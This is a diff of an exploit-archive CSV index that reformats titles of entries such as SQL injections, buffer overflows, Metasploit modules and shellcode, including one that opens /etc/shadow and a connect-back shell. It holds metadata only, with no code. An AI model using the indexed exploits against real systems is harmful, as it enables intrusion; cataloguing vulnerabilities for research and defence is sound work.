16861,platforms/linux/remote/16861.rb,"Samba - trans2open Overflow (Linux x86)",2010-07-14,Metasploit,linux,remote,0 @@ -14738,7 +14738,7 @@ id,file,description,date,author,platform,type,port 16938,platforms/php/webapps/16938.txt,"BMForum Myna 6.0 - SQL Injection",2011-03-07,"Stephan Sattler",php,webapps,0 16939,platforms/multiple/dos/16939.txt,"Hiawatha WebServer 7.4 - Denial of Service",2011-03-07,"Rodrigo Escobar",multiple,dos,0 16940,platforms/windows/local/16940.c,".NET Runtime Optimization Service - Privilege Escalation Exploit (0Day)",2011-03-08,XenoMuta,windows,local,0 -16941,platforms/asp/webapps/16941.txt,"EzPub Simple Classic ASP CMS SQL Injection",2011-03-08,p0pc0rn,asp,webapps,0 +16941,platforms/asp/webapps/16941.txt,"EzPub Simple Classic ASP CMS - SQL Injection",2011-03-08,p0pc0rn,asp,webapps,0 16942,platforms/windows/local/16942.pl,"Movavi VideoSuite 8.0 MediaPlayer m3u Buffer Overflow",2011-03-08,KedAns-Dz,windows,local,0 16943,platforms/windows/dos/16943.pl,"Movavi VideoSuite 8.0 SlideShow jpg Local Crash PoC",2011-03-08,KedAns-Dz,windows,dos,0 16944,platforms/windows/dos/16944.pl,"Movavi VideoSuite 8.0 Movie Editor avi Local Crash PoC",2011-03-08,KedAns-Dz,windows,dos,0 @@ -14759,7 +14759,7 @@ id,file,description,date,author,platform,type,port 16961,platforms/php/webapps/16961.py,"N_CMS 1.1E Pre-Auth - Local File Inclusion Remote Code Exploit",2011-03-11,TecR0c,php,webapps,0 16962,platforms/asp/webapps/16962.txt,"SmarterStats 6.0 - Multiple Vulnerabilities",2011-03-11,"Hoyt LLC Research",asp,webapps,0 16963,platforms/php/webapps/16963.txt,"Constructr CMS 3.03 - MultipleRemote Vulnerabilities",2011-03-11,LiquidWorm,php,webapps,0 -16964,platforms/unix/remote/16964.rb,"Accellion File Transfer Appliance MPIPE2 Command Execution",2011-03-11,Metasploit,unix,remote,8812 +16964,platforms/unix/remote/16964.rb,"Accellion File Transfer Appliance MPIPE2 - Command Execution",2011-03-11,Metasploit,unix,remote,8812 16965,platforms/windows/local/16965.pl,"CoolZip 2.0 - zip Buffer Overflow Exploit",2011-03-12,"C4SS!0 G0M3S",windows,local,0 16966,platforms/linux/dos/16966.php,"PHP 5.3.6 - shmop_read() Integer Overflow DoS",2011-03-12,"Jose Carlos Norte",linux,dos,0 16968,platforms/php/webapps/16968.txt,"Cover Vision SQL Injection",2011-03-13,Egyptian.H4x0rz,php,webapps,0 @@ -14781,7 +14781,7 @@ id,file,description,date,author,platform,type,port 16986,platforms/windows/dos/16986.py,"AVIPreview 0.26 Alpha - Denial of Service",2011-03-16,BraniX,windows,dos,0 16987,platforms/php/webapps/16987.txt,"pointter php content management system 1.2 - Multiple Vulnerabilities",2011-03-16,LiquidWorm,php,webapps,0 16988,platforms/php/webapps/16988.txt,"WikiWig 5.01 - Multiple XSS Vulnerabilities",2011-03-16,"AutoSec Tools",php,webapps,0 -16989,platforms/php/webapps/16989.txt,"b2evolution 4.0.3 Persistent XSS",2011-03-16,"AutoSec Tools",php,webapps,0 +16989,platforms/php/webapps/16989.txt,"b2evolution 4.0.3 - Persistent XSS",2011-03-16,"AutoSec Tools",php,webapps,0 16990,platforms/multiple/remote/16990.rb,"Sun Java Applet2ClassLoader - Remote Code Execution Exploit",2011-03-16,Metasploit,multiple,remote,0 16991,platforms/windows/local/16991.txt,"Microsoft Source Code Analyzer for SQL Injection 1.3 - Improper Permissions",2011-03-17,LiquidWorm,windows,local,0 16992,platforms/php/webapps/16992.txt,"Joomla! 1.6 - Multiple SQL Injection",2011-03-17,"Aung Khant",php,webapps,0 @@ -14790,7 +14790,7 @@ id,file,description,date,author,platform,type,port 16996,platforms/windows/dos/16996.rb,"Fake Webcam 6.1 - Local Crash PoC",2011-03-17,"Anastasios Monachos",windows,dos,0 16997,platforms/php/webapps/16997.txt,"Tugux CMS 1.0_final - Multiple Vulnerabilities",2011-03-17,Aodrulez,php,webapps,0 16998,platforms/windows/remote/16998.rb,"RealNetworks RealPlayer CDDA URI Initialization",2011-03-17,Metasploit,windows,remote,0 -16999,platforms/windows/local/16999.rb,"POP Peeper 3.7 SEH Exploit",2011-03-18,"Anastasios Monachos",windows,local,0 +16999,platforms/windows/local/16999.rb,"POP Peeper 3.7 - SEH Exploit",2011-03-18,"Anastasios Monachos",windows,local,0 17000,platforms/php/webapps/17000.txt,"Tugux CMS (nid) BLIND SQL Injection",2011-03-18,eidelweiss,php,webapps,0 17001,platforms/windows/local/17001.pl,"CORE Multimedia Suite 2011 CORE Player 2.4 - Buffer Overflow (.m3u)",2011-03-18,Rh0,windows,local,0 17002,platforms/php/webapps/17002.txt,"CMS Loko Media - Local File Download",2011-03-18,Xr0b0t,php,webapps,0 @@ -14815,7 +14815,7 @@ id,file,description,date,author,platform,type,port 17024,platforms/windows/remote/17024.txt,"7-technologies igss 9.00.00.11059 - Multiple Vulnerabilities",2011-03-22,"Luigi Auriemma",windows,remote,0 17025,platforms/windows/dos/17025.txt,"DATAC RealWin - Multiple Vulnerabilities",2011-03-22,"Luigi Auriemma",windows,dos,0 17026,platforms/windows/webapps/17026.txt,"Symantec LiveUpdate Administrator Management GUI HTML Injection",2011-03-23,"Nikolas Sotiriu",windows,webapps,0 -17027,platforms/windows/remote/17027.rb,"Adobe Flash Player AVM Bytecode Verification",2011-03-23,Metasploit,windows,remote,0 +17027,platforms/windows/remote/17027.rb,"Adobe Flash Player - AVM Bytecode Verification",2011-03-23,Metasploit,windows,remote,0 17028,platforms/windows/remote/17028.rb,"HP OpenView NNM nnmRptConfig nameParams Buffer Overflow",2011-03-23,Metasploit,windows,remote,0 17029,platforms/windows/remote/17029.rb,"HP NNM CGI webappmon.exe OvJavaLocale Buffer Overflow",2011-03-23,Metasploit,windows,remote,0 17030,platforms/windows/remote/17030.rb,"HP NNM CGI webappmon.exe execvp Buffer Overflow",2011-03-23,Metasploit,windows,remote,0 @@ -14846,7 +14846,7 @@ id,file,description,date,author,platform,type,port 17057,platforms/php/webapps/17057.txt,"webEdition CMS Local File Inclusion",2011-03-28,eidelweiss,php,webapps,0 17058,platforms/linux/remote/17058.rb,"Distributed Ruby Send instance_eval/syscall Code Execution",2011-03-27,Metasploit,linux,remote,0 17061,platforms/php/webapps/17061.txt,"Andy's PHP Knowledgebase Project 0.95.4 - SQL Injection",2011-03-29,"AutoSec Tools",php,webapps,0 -17062,platforms/php/webapps/17062.txt,"Claroline 1.10 Persistent XSS",2011-03-29,"AutoSec Tools",php,webapps,0 +17062,platforms/php/webapps/17062.txt,"Claroline 1.10 - Persistent XSS",2011-03-29,"AutoSec Tools",php,webapps,0 17063,platforms/windows/remote/17063.txt,"easy file sharing Web server 5.8 - Multiple Vulnerabilities",2011-03-29,"AutoSec Tools",windows,remote,0 17064,platforms/windows/local/17064.py,"IDEAL Administration 2011 11.4 - Local SEH Buffer Overflow Exploit",2011-03-29,Dr_IDE,windows,local,0 17068,platforms/multiple/remote/17068.py,"jHTTPd 0.1a - Directory Traversal",2011-03-29,"AutoSec Tools",multiple,remote,0 @@ -14885,7 +14885,7 @@ id,file,description,date,author,platform,type,port 17103,platforms/php/webapps/17103.txt,"Advanced Image Hosting 2.2 - (index.php) SQL Injection",2011-04-03,keracker,php,webapps,0 17104,platforms/windows/remote/17104.txt,"RealNetworks RealGames StubbyUtil.ShellCtl.1 - ActiveX Control Multiple Remote Command Execution",2011-04-03,rgod,windows,remote,0 17105,platforms/windows/remote/17105.txt,"RealNetworks RealGames StubbyUtil.ProcessMgr.1 - ActiveX Control Multiple Remote Command Execution",2011-04-03,rgod,windows,remote,0 -17106,platforms/php/webapps/17106.txt,"Rash CMS SQL Injection",2011-04-03,keracker,php,webapps,0 +17106,platforms/php/webapps/17106.txt,"Rash CMS - SQL Injection",2011-04-03,keracker,php,webapps,0 17107,platforms/php/webapps/17107.txt,"Banner Ad Management Script SQL Injection",2011-04-03,Egyptian.H4x0rz,php,webapps,0 17108,platforms/php/webapps/17108.txt,"OpenCart 1.4.9 - Multiple Local File Inclusion",2011-04-03,KedAns-Dz,php,webapps,0 17432,platforms/sh4/shellcode/17432.c,"Linux/SuperH (sh4) - setuid(0) / chmod(_/etc/shadow__ 0666) / exit(0) Shellcode (43 bytes)",2011-06-22,"Jonathan Salwan",sh4,shellcode,0 @@ -14917,7 +14917,7 @@ id,file,description,date,author,platform,type,port 17137,platforms/php/webapps/17137.txt,"Nooms CMS 1.1.1 - CSRF",2011-04-09,loneferret,php,webapps,0 17178,platforms/php/webapps/17178.txt,"Blue Hat Sensitive Database Disclosure SQLi",2011-04-16,^Xecuti0N3r,php,webapps,0 17179,platforms/php/webapps/17179.txt,"Bedder CMS - Blind SQL Injection",2011-04-16,^Xecuti0N3r,php,webapps,0 -17180,platforms/php/webapps/17180.txt,"Shape Web Solutions CMS SQL Injection",2011-04-16,"Ashiyane Digital Security Team",php,webapps,0 +17180,platforms/php/webapps/17180.txt,"Shape Web Solutions CMS - SQL Injection",2011-04-16,"Ashiyane Digital Security Team",php,webapps,0 17140,platforms/multiple/dos/17140.txt,"Libmodplug ReadS3M Stack Overflow",2011-04-09,"SEC Consult",multiple,dos,0 17141,platforms/php/webapps/17141.txt,"Point Market System 3.1x vbulletin plugin SQLi",2011-04-10,Net.Edit0r,php,webapps,0 17142,platforms/windows/dos/17142.py,"IrfanView 4.28 - ICO With Transparent Colour DoS & RDoS",2011-04-10,BraniX,windows,dos,0 @@ -14949,7 +14949,7 @@ id,file,description,date,author,platform,type,port 17172,platforms/php/webapps/17172.txt,"cPassMan 1.82 - Arbitrary File Download",2011-04-15,"Sense of Security",php,webapps,0 17173,platforms/php/webapps/17173.txt,"TextAds 2.08 Script Cross-Site Scripting",2011-04-15,"Ashiyane Digital Security Team",php,webapps,0 17174,platforms/multiple/webapps/17174.txt,"SQL-Ledger 2.8.33 Post-authentication Local File Inclusion/Edit",2011-04-15,bitform,multiple,webapps,0 -17175,platforms/windows/remote/17175.rb,"Adobe Flash Player 10.2.153.1 SWF Memory Corruption",2011-04-16,Metasploit,windows,remote,0 +17175,platforms/windows/remote/17175.rb,"Adobe Flash Player 10.2.153.1 - SWF Memory Corruption",2011-04-16,Metasploit,windows,remote,0 17176,platforms/asp/webapps/17176.txt,"SoftXMLCMS Shell Upload",2011-04-16,Alexander,asp,webapps,0 17177,platforms/windows/local/17177.rb,"Microsoft Word 2003 - Record Parsing Buffer Overflow (MS09-027) (Metasploit)",2011-04-16,"Andrew King",windows,local,0 17183,platforms/php/webapps/17183.txt,"osPHPSite SQL Injection",2011-04-17,"vir0e5 ",php,webapps,0 @@ -14980,7 +14980,7 @@ id,file,description,date,author,platform,type,port 17214,platforms/php/webapps/17214.php,"WordPress SermonBrowser Plugin 0.43 - SQL Injection",2011-04-26,Ma3sTr0-Dz,php,webapps,0 17215,platforms/hardware/webapps/17215.txt,"Snom IP Phone Web Interface < 8 - Multiple Vulnerabilities",2011-04-26,"Yakir Wizman",hardware,webapps,0 17216,platforms/php/webapps/17216.txt,"Quick.CMS 3.0 - CSRF",2011-04-26,^Xecuti0N3r,php,webapps,0 -17217,platforms/windows/local/17217.py,"Subtitle Processor 7.7.1 SEH Unicode Buffer Overflow Exploit",2011-04-27,"Brandon Murphy",windows,local,0 +17217,platforms/windows/local/17217.py,"Subtitle Processor 7.7.1 - SEH Unicode Buffer Overflow Exploit",2011-04-27,"Brandon Murphy",windows,local,0 17218,platforms/php/webapps/17218.txt,"Symphony CMS 2.1.2 - Blind SQL Injection",2011-04-27,Wireghoul,php,webapps,0 17219,platforms/windows/remote/17219.rb,"EMC HomeBase Server Directory Traversal Remote Code Execution",2011-04-27,Metasploit,windows,remote,18821 17220,platforms/php/webapps/17220.txt,"eyeos 1.9.0.2 - Stored XSS using image files",2011-04-28,"Alberto Ortega",php,webapps,0 @@ -15081,7 +15081,7 @@ id,file,description,date,author,platform,type,port 17349,platforms/hardware/webapps/17349.txt,"Belkin G Wireless Router F5D7234-4 v5 Exploit",2011-05-30,Aodrulez,hardware,webapps,0 17350,platforms/php/webapps/17350.txt,"Guru JustAnswer Professional 1.25 - Multiple SQL Injection",2011-05-30,v3n0m,php,webapps,0 17351,platforms/hardware/dos/17351.py,"iPhone4 FTP Server 1.0 - Empty CWD-RETR Remote Crash",2011-05-31,offsetIntruder,hardware,dos,0 -17352,platforms/windows/remote/17352.rb,"7-Technologies IGSS 9 Data Server/Collector Packet Handling Vulnerabilities",2011-05-30,Metasploit,windows,remote,0 +17352,platforms/windows/remote/17352.rb,"7-Technologies IGSS 9 - Data Server/Collector Packet Handling Vulnerabilities",2011-05-30,Metasploit,windows,remote,0 17353,platforms/hardware/dos/17353.pl,"Brother HL-5370DW series auth bypass printer flooder",2011-05-31,chrisB,hardware,dos,0 17354,platforms/windows/remote/17354.py,"Easy Ftp Server 1.7.0.2 - Post-Authentication BoF",2011-06-01,b33f,windows,remote,0 17355,platforms/windows/remote/17355.rb,"Golden FTP 4.70 - PASS Stack Buffer Overflow",2011-06-02,Metasploit,windows,remote,21 @@ -15099,9 +15099,9 @@ id,file,description,date,author,platform,type,port 17371,platforms/lin_x86/shellcode/17371.txt,"Linux/x86 - ConnectBack with SSL connection shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",lin_x86,shellcode,0 17373,platforms/windows/remote/17373.py,"ActFax Server FTP - Remote BoF (post auth) Bigger Buffer",2011-06-08,b33f,windows,remote,0 17372,platforms/windows/dos/17372.txt,"VLC Media Player - XSPF Local File Integer Overflow in XSPF playlist parser",2011-06-08,TecR0c,windows,dos,0 -17374,platforms/windows/remote/17374.rb,"7-Technologies IGSS 9 IGSSdataServer .Rms Rename Buffer Overflow",2011-06-09,Metasploit,windows,remote,0 +17374,platforms/windows/remote/17374.rb,"7-Technologies IGSS 9 - IGSSdataServer .Rms Rename Buffer Overflow",2011-06-09,Metasploit,windows,remote,0 17375,platforms/asp/webapps/17375.txt,"EquiPCS SQL Injection Exploit",2011-06-09,Sideswipe,asp,webapps,0 -17376,platforms/hardware/webapps/17376.txt,"Aastra IP Phone 9480i Web Interface Data disclosure",2011-06-09,"Yakir Wizman",hardware,webapps,0 +17376,platforms/hardware/webapps/17376.txt,"Aastra IP Phone 9480i - Web Interface Data disclosure",2011-06-09,"Yakir Wizman",hardware,webapps,0 17377,platforms/hardware/webapps/17377.txt,"Polycom IP Phone Web Interface Data Diclosure",2011-06-09,"Yakir Wizman",hardware,webapps,0 17378,platforms/php/webapps/17378.py,"Pacer Edition CMS 2.1 - (rm) Remote Arbitrary File Deletion Exploit",2011-06-10,LiquidWorm,php,webapps,0 17379,platforms/php/webapps/17379.txt,"Pacer Edition CMS 2.1 - (l param) Local File Inclusion",2011-06-10,LiquidWorm,php,webapps,0 @@ -15128,10 +15128,10 @@ id,file,description,date,author,platform,type,port 17402,platforms/php/webapps/17402.txt,"AMHSHOP 3.7.0 - SQL Injection",2011-06-15,"Yassin Aboukir",php,webapps,0 17403,platforms/php/webapps/17403.txt,"Free Simple CMS 1.0 - Multiple Vulnerabilities",2011-06-15,"High-Tech Bridge SA",php,webapps,0 17404,platforms/multiple/webapps/17404.txt,"IBM WebSphere Application Server 7.0.0.13 - CSRF",2011-06-15,"Core Security",multiple,webapps,0 -17405,platforms/windows/dos/17405.txt,"Adobe Reader/Acrobat 10.0.1 Denial of Service",2011-06-16,"Soroush Dalili",windows,dos,0 +17405,platforms/windows/dos/17405.txt,"Adobe Reader/Acrobat 10.0.1 - Denial of Service",2011-06-16,"Soroush Dalili",windows,dos,0 17406,platforms/php/webapps/17406.txt,"Catalog Builder - Ecommerce Software - Blind SQL Injection",2011-06-16,takeshix,php,webapps,0 17408,platforms/php/webapps/17408.txt,"WeBid 1.0.2 persistent XSS via SQL Injection",2011-06-17,Saif,php,webapps,0 -17409,platforms/windows/remote/17409.rb,"Microsoft Internet Explorer - mshtml!CObjectElement Use After Free (MS11-050)",2011-06-17,Metasploit,windows,remote,0 +17409,platforms/windows/remote/17409.rb,"Microsoft Internet Explorer - mshtml!CObjectElement Use-After-Free (MS11-050)",2011-06-17,Metasploit,windows,remote,0 17410,platforms/php/webapps/17410.txt,"AiCart 2.0 - Multiple Vulnerabilities",2011-06-18,takeshix,php,webapps,0 17411,platforms/php/webapps/17411.txt,"A Cool Debate 1.0.3 Component Joomla - Local File Inclusion",2011-06-18,"Chip d3 bi0s",php,webapps,0 17412,platforms/php/webapps/17412.txt,"Joomla Component (com_team) - SQL Injection",2011-06-19,CoBRa_21,php,webapps,0 @@ -15320,7 +15320,7 @@ id,file,description,date,author,platform,type,port 17635,platforms/hardware/remote/17635.rb,"HP JetDirect PJL Interface Universal Path Traversal (Metasploit)",2011-08-07,"Myo Soe",hardware,remote,0 17636,platforms/hardware/remote/17636.rb,"HP JetDirect PJL Query Execution (Metasploit)",2011-08-07,"Myo Soe",hardware,remote,0 17638,platforms/windows/dos/17638.py,"LiteServe 2.81 PASV Command Denial of Service",2011-08-08,"Craig Freyman",windows,dos,0 -17639,platforms/php/webapps/17639.txt,"XpressEngine 1.4.5.7 Persistent XSS",2011-08-08,v0nSch3lling,php,webapps,0 +17639,platforms/php/webapps/17639.txt,"XpressEngine 1.4.5.7 - Persistent XSS",2011-08-08,v0nSch3lling,php,webapps,0 17640,platforms/php/webapps/17640.txt,"BlogPHP 2.0 - Persistent XSS",2011-08-09,Paulzz,php,webapps,0 17641,platforms/php/webapps/17641.txt,"Lasernet CMS 1.5 - SQL Injection",2011-08-09,p0pc0rn,php,webapps,0 17642,platforms/windows/dos/17642.txt,"Acoustica Mixcraft 1.00 - Local Crash",2011-08-09,NassRawI,windows,dos,0 @@ -15332,7 +15332,7 @@ id,file,description,date,author,platform,type,port 17648,platforms/linux/remote/17648.sh,"HP Data Protector - Remote Root Shell (Linux)",2011-08-10,SZ,linux,remote,0 17649,platforms/windows/remote/17649.py,"BisonFTP Server 3.5 - Remote Buffer Overflow Exploit",2011-08-10,localh0t,windows,remote,0 17650,platforms/windows/remote/17650.rb,"Mozilla Firefox 3.6.16 - mChannel use after free (1)",2011-08-10,Metasploit,windows,remote,0 -17653,platforms/cgi/webapps/17653.txt,"Adobe RoboHelp 9 DOM Cross-Site Scripting",2011-08-11,"Roberto Suggi Liverani",cgi,webapps,0 +17653,platforms/cgi/webapps/17653.txt,"Adobe RoboHelp 9 - DOM Cross-Site Scripting",2011-08-11,"Roberto Suggi Liverani",cgi,webapps,0 17654,platforms/windows/local/17654.py,"MP3 CD Converter Professional 5.3.0 - Universal DEP Bypass Exploit",2011-08-11,"C4SS!0 G0M3S",windows,local,0 17656,platforms/windows/remote/17656.rb,"TeeChart Professional ActiveX Control 2010.0.0.3 - Trusted Integer Dereference",2011-08-11,Metasploit,windows,remote,0 17665,platforms/windows/local/17665.pl,"D.R. Software Audio Converter 8.1 - DEP Bypass Exploit",2011-08-13,"C4SS!0 G0M3S",windows,local,0 @@ -15346,7 +15346,7 @@ id,file,description,date,author,platform,type,port 17664,platforms/windows/dos/17664.py,"NSHC Papyrus 2.0 - Heap Overflow",2011-08-13,wh1ant,windows,dos,0 17667,platforms/php/webapps/17667.php,"Contrexx Shopsystem 2.2 SP3 - Blind SQL Injection",2011-08-14,Penguin,php,webapps,0 17669,platforms/windows/remote/17669.py,"Simple HTTPd 1.42 - PUT Request Remote Buffer Overflow",2011-08-15,nion,windows,remote,0 -17672,platforms/windows/remote/17672.html,"Mozilla Firefox 3.6.16 - mChannel Object Use After Free Exploit (Windows 7)",2011-08-16,mr_me,windows,remote,0 +17672,platforms/windows/remote/17672.html,"Mozilla Firefox 3.6.16 - mChannel Object Use-After-Free Exploit (Windows 7)",2011-08-16,mr_me,windows,remote,0 17673,platforms/php/webapps/17673.txt,"WordPress IP-Logger Plugin 3.0 - SQL Injection",2011-08-16,"Miroslav Stampar",php,webapps,0 17674,platforms/php/webapps/17674.txt,"Joomla JoomTouch Component - Local File Inclusion",2011-08-17,NoGe,php,webapps,0 17675,platforms/php/webapps/17675.txt,"SoftwareDEP Classified Script 2.5 - SQL Injection",2011-08-17,v3n0m,php,webapps,0 @@ -15383,7 +15383,7 @@ id,file,description,date,author,platform,type,port 17709,platforms/php/webapps/17709.txt,"Bonza Digital Cart Script SQL Injection",2011-08-22,"Eyup CELIK",php,webapps,0 17710,platforms/php/webapps/17710.txt,"DV Cart Shopping Cart software SQL Injection",2011-08-22,"Eyup CELIK",php,webapps,0 17711,platforms/asp/webapps/17711.txt,"Redlab CMS - Multiple SQL Injection",2011-08-22,tempe_mendoan,asp,webapps,0 -17712,platforms/windows/dos/17712.txt,"Adobe Photoshop CS5 GIF Remote Code Execution",2011-08-22,"Francis Provencher",windows,dos,0 +17712,platforms/windows/dos/17712.txt,"Adobe Photoshop CS5 - .GIF Remote Code Execution",2011-08-22,"Francis Provencher",windows,dos,0 17713,platforms/jsp/webapps/17713.txt,"ManageEngine ServiceDesk Plus 8.0 - Multiple Stored XSS Vulnerabilities",2011-08-23,LiquidWorm,jsp,webapps,0 17714,platforms/php/webapps/17714.txt,"Help Desk Software 1.1g - CSRF (add admin)",2011-08-24,G13,php,webapps,0 17715,platforms/windows/local/17715.html,"F-Secure Multiple Products - ActiveX SEH Overwrite (Heap Spray)",2011-08-24,41.w4r10r,windows,local,0 @@ -15493,10 +15493,10 @@ id,file,description,date,author,platform,type,port 17832,platforms/php/webapps/17832.txt,"WordPress Plugin e-Commerce 3.8.6 - SQL Injection",2011-09-14,"Miroslav Stampar",php,webapps,0 17833,platforms/windows/local/17833.rb,"ScadaTEC ScadaPhone 5.3.11.1230 - Stack Buffer Overflow",2011-09-13,Metasploit,windows,local,0 17835,platforms/windows/dos/17835.txt,"Beckhoff TwinCAT 2.11.0.2004 - Denial of Service",2011-09-14,"Luigi Auriemma",windows,dos,0 -17836,platforms/windows/dos/17836.txt,"Equis MetaStock 11 Use After Free",2011-09-14,"Luigi Auriemma",windows,dos,0 +17836,platforms/windows/dos/17836.txt,"Equis MetaStock 11 - Use-After-Free",2011-09-14,"Luigi Auriemma",windows,dos,0 17837,platforms/windows/dos/17837.txt,"eSignal and eSignal Pro 10.6.2425.1208 - Multiple Vulnerabilites",2011-09-14,"Luigi Auriemma",windows,dos,0 17838,platforms/windows/dos/17838.txt,"Cogent DataHub 7.1.1.63 - Stack Overflow",2011-09-14,"Luigi Auriemma",windows,dos,0 -17839,platforms/windows/dos/17839.txt,"Cogent DataHub 7.1.1.63 Integer Overflow",2011-09-14,"Luigi Auriemma",windows,dos,0 +17839,platforms/windows/dos/17839.txt,"Cogent DataHub 7.1.1.63 - Integer Overflow",2011-09-14,"Luigi Auriemma",windows,dos,0 17840,platforms/windows/webapps/17840.txt,"Cogent DataHub 7.1.1.63 Source Disclosure",2011-09-14,"Luigi Auriemma",windows,webapps,0 17841,platforms/windows/dos/17841.txt,"DAQFactory 5.85 build 1853 - Stack Overflow",2011-09-14,"Luigi Auriemma",windows,dos,0 17842,platforms/windows/dos/17842.txt,"progea movicon / powerhmi 11.2.1085 - Multiple Vulnerabilities",2011-09-14,"Luigi Auriemma",windows,dos,0 @@ -15542,7 +15542,7 @@ id,file,description,date,author,platform,type,port 17886,platforms/windows/remote/17886.py,"FreeFloat FTP Server - Buffer Overflow Exploit (DEP Bypass)",2011-09-23,blake,windows,remote,0 17887,platforms/php/webapps/17887.txt,"WordPress Link Library plugin 5.2.1 - SQL Injection",2011-09-24,"Miroslav Stampar",php,webapps,0 17888,platforms/php/webapps/17888.txt,"WordPress AdRotate plugin 3.6.5 - SQL Injection",2011-09-24,"Miroslav Stampar",php,webapps,0 -17889,platforms/windows/dos/17889.txt,"Sterling Trader 7.0.2 Integer Overflow",2011-09-26,"Luigi Auriemma",windows,dos,0 +17889,platforms/windows/dos/17889.txt,"Sterling Trader 7.0.2 - Integer Overflow",2011-09-26,"Luigi Auriemma",windows,dos,0 17890,platforms/windows/dos/17890.c,"GMER 1.0.15.15641 MFT Overwrite",2011-09-26,Heurs,windows,dos,0 17891,platforms/php/webapps/17891.txt,"WordPress CevherShare Plugin 2.0 - SQL Injection",2011-09-26,bd0rk,php,webapps,0 17892,platforms/windows/local/17892.pl,"Muse Music All-In-One 1.5.0.001 - (.pls) Buffer Overflow (DEP Bypass)",2011-09-26,"C4SS!0 G0M3S",windows,local,0 @@ -15608,9 +15608,9 @@ id,file,description,date,author,platform,type,port 17961,platforms/php/webapps/17961.txt,"MyBB Advanced Forum Signatures - (afsignatures-2.0.4) SQL Injection",2011-10-10,Mario_Vs,php,webapps,0 17962,platforms/php/webapps/17962.txt,"MyBB Forum Userbar Plugin (Userbar 2.2) - SQL Injection",2011-10-10,Mario_Vs,php,webapps,0 17963,platforms/windows/dos/17963.txt,"atvise webMI2ADS Web Server 1.0 - Multiple Vulnerabilities",2011-10-10,"Luigi Auriemma",windows,dos,0 -17964,platforms/windows/dos/17964.txt,"IRAI AUTOMGEN 8.0.0.7 Use After Free",2011-10-10,"Luigi Auriemma",windows,dos,0 +17964,platforms/windows/dos/17964.txt,"IRAI AUTOMGEN 8.0.0.7 - Use-After-Free",2011-10-10,"Luigi Auriemma",windows,dos,0 17965,platforms/windows/dos/17965.txt,"OPC Systems.NET 4.00.0048 - Denial of Service",2011-10-10,"Luigi Auriemma",windows,dos,0 -17966,platforms/windows/local/17966.rb,"ACDSee FotoSlate PLP File id Parameter Overflow",2011-10-10,Metasploit,windows,local,0 +17966,platforms/windows/local/17966.rb,"ACDSee FotoSlate - .PLP File id Parameter Overflow",2011-10-10,Metasploit,windows,local,0 17967,platforms/windows/local/17967.rb,"TugZip 3.5 Zip File Parsing Buffer Overflow",2011-10-11,Metasploit,windows,local,0 17974,platforms/windows/remote/17974.html,"Mozilla Firefox - Array.reduceRight() Integer Overflow Exploit",2011-10-12,ryujin,windows,remote,0 17975,platforms/windows/remote/17975.rb,"PcVue 10.0 SV.UIGrdCtrl.1 - 'LoadObject()/SaveObject()' Trusted DWORD",2011-10-12,Metasploit,windows,remote,0 @@ -15639,7 +15639,7 @@ id,file,description,date,author,platform,type,port 18002,platforms/php/webapps/18002.txt,"Uiga Personal Portal - Multiple Vulnerabilities",2011-10-20,"Eyup CELIK",php,webapps,0 18003,platforms/php/webapps/18003.txt,"fims File Management System 1.2.1a - Multiple Vulnerabilities",2011-10-20,Skraps,php,webapps,0 18004,platforms/php/webapps/18004.txt,"Simple Free PHP Forum Script SQL Injection",2011-10-20,Skraps,php,webapps,0 -18005,platforms/windows/webapps/18005.txt,"OCS Inventory NG 2.0.1 Persistent XSS",2011-10-20,"Nicolas DEROUET",windows,webapps,0 +18005,platforms/windows/webapps/18005.txt,"OCS Inventory NG 2.0.1 - Persistent XSS",2011-10-20,"Nicolas DEROUET",windows,webapps,0 18006,platforms/windows/dos/18006.html,"Opera 11.52 PoC Denial of Service",2011-10-20,pigtail23,windows,dos,0 18007,platforms/windows/dos/18007.txt,"Oracle DataDirect Multiple Native Wire Protocol ODBC Drivers HOST Attribute Stack Based Buffer Overflow",2011-10-20,rgod,windows,dos,0 18008,platforms/windows/dos/18008.html,"Opera 11.52 - Stack Overflow",2011-10-20,pigtail23,windows,dos,0 @@ -15647,7 +15647,7 @@ id,file,description,date,author,platform,type,port 18011,platforms/windows/dos/18011.txt,"UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow",2011-10-20,DiGMi,windows,dos,0 18012,platforms/multiple/webapps/18012.txt,"Metasploit 4.1.0 Web UI - Stored XSS",2011-10-20,"Stefan Schurtz",multiple,webapps,0 18013,platforms/windows/webapps/18013.py,"Cyclope Internet Filtering Proxy 4.0 - Stored XSS",2011-10-20,loneferret,windows,webapps,0 -18014,platforms/windows/dos/18014.html,"Opera 11.51 Use After Free Crash PoC",2011-10-21,"Roberto Suggi Liverani",windows,dos,0 +18014,platforms/windows/dos/18014.html,"Opera 11.51 - Use-After-Free Crash PoC",2011-10-21,"Roberto Suggi Liverani",windows,dos,0 18015,platforms/cgi/remote/18015.rb,"HP Power Manager - 'formExportDataLogs' Buffer Overflow",2011-10-20,Metasploit,cgi,remote,0 18016,platforms/windows/remote/18016.txt,"Oracle AutoVue 20.0.1 AutoVueX - ActiveX Control SaveViewStateToFile",2011-10-21,rgod,windows,remote,0 18017,platforms/windows/dos/18017.py,"Cyclope Internet Filtering Proxy 4.0 - CEPMServer.exe DoS (Poc)",2011-10-21,loneferret,windows,dos,0 @@ -15701,7 +15701,7 @@ id,file,description,date,author,platform,type,port 18075,platforms/php/webapps/18075.txt,"Ajax File and Image Manager 1.0 Final - Remote Code Execution",2011-11-04,EgiX,php,webapps,0 18076,platforms/php/webapps/18076.txt,"Advanced Poll 2.02 - SQL Injection",2011-11-04,"Yassin Aboukir",php,webapps,0 18077,platforms/windows/webapps/18077.txt,"HP Data Protector Media Operations 6.20 - Directory Traversal",2011-11-04,"Luigi Auriemma",windows,webapps,0 -18078,platforms/windows/dos/18078.txt,"Microsoft Excel 2003 11.8335.8333 Use After Free",2011-11-04,"Luigi Auriemma",windows,dos,0 +18078,platforms/windows/dos/18078.txt,"Microsoft Excel 2003 11.8335.8333 - Use-After-Free",2011-11-04,"Luigi Auriemma",windows,dos,0 18079,platforms/hardware/remote/18079.pl,"DreamBox DM800 1.5rc1 - Remote Root File Disclosure Exploit",2011-11-04,"Todor Donev",hardware,remote,0 18080,platforms/linux/local/18080.c,"Linux Kernel 2.6.37-rc1 - serial_multiport_struct Local Information Leak Exploit",2011-11-04,"Todor Donev",linux,local,0 18081,platforms/php/webapps/18081.txt,"WHMCS 3.x.x - (clientarea.php) Local File Disclosure",2011-11-04,"red virus",php,webapps,0 @@ -15717,7 +15717,7 @@ id,file,description,date,author,platform,type,port 